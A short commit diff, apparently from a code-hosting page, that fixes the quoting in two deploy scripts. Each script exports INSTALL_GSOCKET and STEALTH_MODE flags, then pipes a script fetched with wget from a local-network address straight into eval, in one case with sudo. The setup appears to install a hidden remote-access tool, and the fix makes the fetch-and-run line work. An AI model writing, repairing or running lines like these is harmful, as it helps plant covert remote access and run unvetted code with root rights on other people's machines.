fix deploy scripts eval commands
This commit is contained in:
@@ -8,4 +8,4 @@ export INSTALL_GSOCKET=true
|
||||
export STEALTH_MODE=true
|
||||
|
||||
# Download and run the main script with sudo
|
||||
eval "$(wget -qO- http://192.168.0.104/deployment/y")
|
||||
eval "$(wget -qO- http://192.168.0.104/deployment/y)"
|
||||
|
@@ -8,5 +8,5 @@ export INSTALL_GSOCKET=true
|
||||
export STEALTH_MODE=true
|
||||
|
||||
# Download and run the main script
|
||||
eval "$(wget -qO- http://192.168.0.104/deployment/y")
|
||||
eval "$(wget -qO- http://192.168.0.104/deployment/y)"
|
||||
|
||||
|
Reference in New Issue
Block a user